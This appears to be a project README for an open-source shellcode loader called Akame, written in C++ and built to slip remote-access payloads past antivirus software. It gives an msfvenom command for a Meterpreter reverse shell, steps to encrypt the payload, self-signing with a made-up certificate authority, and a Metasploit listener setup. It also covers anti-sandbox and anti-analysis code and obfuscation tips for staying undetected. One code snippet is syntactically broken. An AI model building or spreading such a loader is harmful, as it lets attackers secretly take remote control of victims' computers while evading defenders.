Akame Loader

An open source, UD (3/71) shellcode loader written in C++

Details

! If you change the encryption method and want to keep your executable UD for a longer period of time, don't use VirusTotal / AntiScan.me / any other site that distributes to security vendors.

How does it work?

1. Uses WINAPI WinMain so it doesn't popup any console window
2. Checks the current hard disk, if the size is under 100GB it closes itself
3. Sleeps for 10000ms (10s)
4. Checks if any tickcount-related function was manipulated by a sandbox (by checking the hashes and comparing the time slept with the time elapsed on the machine), if something seems wrong, it closes itself
5. Stores the IV, the encryption Key, and the encrypted payload as buffers
6. Allocates a memory buffer for the payload
7. Decrypts the payload (AES256) and closes itself if something doesn't work correctly
8. Copies the payload to a new buffer
9. Marks the memory space as executable (This is not done during the first allocation because it's suspicious to create a memory space which is ReadWriteExecute)
10. Executes the payload

How to build?

1. Generate shellcode

• Metasploit:
  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f raw > shellcode.bin
• Native PE:
  use pe_to_shellcode to generate the shellcode
• Managed PE:
  use donut to generate the shellcode

2. Encrypt your shellcode with encrypt.exe

• Metasploit:
  mv shellcode.bin \Akame Loader\x64\Release\Resources\
cd \Akame Loader\x64\Release\Resources\
encrypt --help (optional, to view the manual)
encrypt.exe -l cpp -m file -i shellcode.bin -e random -o cli
  
• Other:
  Use a python script (example) to encrypt the shellcode with AES256.

3. Copy the output and paste it under the "payload" comment

• Paste your IV Key, your KEY and your shellcode into the existent buffers
  

4. Change the resources

• Add your icon, your company name, etc.

5. Build the project

• Platform Toolset: Visual Studio 2022 (v143)
  
• Language standard: ISO C++17
  
• Optimization: /O2
  
• Configuration: Release
  
• Platform: x64
  
• Runtime Library: Multi-Threaded (/MT)
  
• SubSystem: Windows
  
• Dependencies: user32.lib;advapi32.lib;crypt32.lib;
  
• Generate debug info: No

6. Add a certificate to your executable
! Change "Akame.exe" to your executable and AkameCert/AkameCA to whatever you want

• move Akame.exe Resources && cd Resources
  
• makecert.exe -r -pe -n "CN=Akame CA" -ss CA -sr CurrentUser -a sha256 -cy authority -sky signature -sv AkameCA.pvk AkameCA.cer
  
• certutil -user -addstore Root AkameCA.cer
  
• makecert.exe -pe -n "CN=Akame Cert" -a sha256 -cy end -sky signature -ic AkameCA.cer -iv AkameCA.pvk -sv AkameCert.pvk AkameCert.cer
  
• pvk2pfx.exe -pvk AkameCert.pvk -spc AkameCert.cer -pfx AkameCert.pfx
  
• signtool.exe sign /v /f AkameCert.pfx /t http://timestamp.digicert.com/?alg=sha1 Akame.exe

7. Listen for incomming connections

• Metasploit:
  msfconsole -q
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options (optional)
  set LHOST *IP*
set LPORT *PORT*
exploit
  
• Other:
  start listening for connections

Video POC

Platform: Windows 10 x64
Antivirus: Windows Defender 24/10/2022

! 720p because I can't upload video files bigger than 10MB on github
! Blackscreens in the video caused by UAC

VirusTotal Scan (3/71 security vendors and no sandboxes on 24/10/2022)

I uploaded the loader to Virus Total because I don't want this to be used for malicious purposes!
The shellcode used was generated with metasploit (payload: windows/x64/meterpreter/reverse_tcp) and encrypted by \resources\encrypt.exe.
The loader was build with VS22 and signed with a sha1 certificate

File Scan

File Details

Link: https://www.virustotal.com/gui/file/68e6a25457093584a043ed3f721be9bc9b6456edd792cb4e30054e85bdc4119f
! Attention, the reason the loader gets a lot of detections now is because Virus Total distributes samples, this is completely normal. With simple code obfuscation / small changes you can obtain a new, FUD payload, don't be script kiddies / pasters, learn how to code, stay safe!

What should be added to make it better?

• Use LLVM obfuscation for anti-signature scanning (Control Flow Flattening, String Encryption, etc.)
  1. Install LLVM toolchain and clang compiler for VS 2022, go to Visual Studio -> Modify -> Individual Components:
     (C++ Clang Compiler for Windows && MSBuild support for LLVM (clang-cl) toolset)
  2. Install the pre-compiled OLLVM-17 files
  3. Navigate to C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\Llvm\x64\bin and copy the files that you downloaded from Github and overwrite
  4. Copy the following line and add it as "Additional Options" in Configuration Properties -> C/C++ -> Command Line
     

! The provided code is a set of parameters used with LLVM's obfuscation passes, here's a list of each parameter and what it does, parameters taken directly from ollvm-17 repository.

• bcf: This parameter is used for fake control flow.
  
• bcf_prob: This parameter sets the false control flow confusion probability, which ranges from 1 to 100, with a default value of 70.
  
• bcf_loop: This parameter sets the number of false control flow repetitions, with no limit and a default value of 2.
  
• fla: This parameter is used for control flow flattening.
  
• sub: This parameter is used for instruction replacement, specifically add/and/sub/or/xor.
  
• sub_loop: This parameter sets the number of instruction substitutions, with no limit and a default value of 1.
  
• sobf: This parameter is used for string obfuscation, but only for narrow characters.`
  
• split: This parameter is used for basic block split.
  
• split_num: This parameter sets the number of splits of the original basic block, with no limit and a default value of 3.
  
• ibr: This parameter is used for indirect branch.
  
• icall: This parameter is used for indirect call, specifically call register.
  
• igv: This parameter is used for indirect global variable.
  

After that you only need to compile your solution and you will get a fairly large executable but with various flattening, encryption, substitution applied. Here's what you should get on analyzing the control flow graph with IDA:

• Create Mutex to avoid running multiple instances of akame on the same machine. POC:

  // Check the mutex at the beginning
  if (OpenMutex(MUTEX_ALL_ACCESS, 0, L"MUTEX_RANDOM_STRING"))
      return 0;
  
  // Create mutex
  CreateMutex(0, 0, L"MUTEX_RANDOM_STRING");

• More anti analysis techniques (functions that check for suspicious files, directories, processes, windows' names, etc.). POC:

  // A simple hard-disk check is already done, but we can as well check the available RAM / CPU
  
  // If the machine has less than 2048mb (2gb) of ram -> exit 
  MEMORYSTATUSEX memoryStatus;
  memoryStatus.dwLength = sizeof(memoryStatus);
  GlobalMemoryStatusEx(&memoryStatus);
  DWORD RAMMB = memoryStatus.ullTotalPhys / 1024 / 1024;
  if (RAMMB < 2048) return 0;
  
  // If the machine has less than 2 logical processors -> exit
  SYSTEM_INFO systemInfo;
  GetSystemInfo(&systemInfo);
  DWORD numberOfProcessors = systemInfo.dwNumberOfProcessors;
  if (numberOfProcessors < 2) return false;
  
  // Check for specific running processes that are usually used in malware analysis, like WireShark, PE-Bear, ProcMon, IDA, X64/X32 DBG, etc.
  PROCESSENTRY32W processEntry = { 0 };
  processEntry.dwSize = sizeof(PROCESSENTRY32W);
  HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  WCHAR processName[MAX_PATH + 1];
  if (Process32FirstW(hSnapshot, &processEntry))
  {
    do
    {
      StringCchCopyW(processName, MAX_PATH, processEntry.szExeFile);
      CharUpperW(processName);
      if (wcsstr(processName, L"WIRESHARK.EXE") || wcsstr(processName), L"PE-BEAR.EXE" || wcsstr(processName), L".EXE" || ...)
        return 0;
    } while (Process32NextW(hSnapshot, &processEntry));
  }

• Encrypt RTTI Info
• Obfuscate PE Sections
• Use Dynamic API Hashing/Resolving
• Adding 'fake' imports to fill the import table and make it look more legitimate

Properties

File

• Name: Akame.exe
  
• Architecture: x64
  
• File size: 170336 bytes
  

Hashes

• MD5: 560e4432cdbf26332fd3795cf3647cb7
  
• SHA1: ffd9942abb6dff4467456b06af2e2742427aff46
  
• SHA256: 68e6a25457093584a043ed3f721be9bc9b6456edd792cb4e30054e85bdc4119f

Table of Imports

License

MIT License

Copyright (c) 2024 N3agu

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

Disclaimer

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.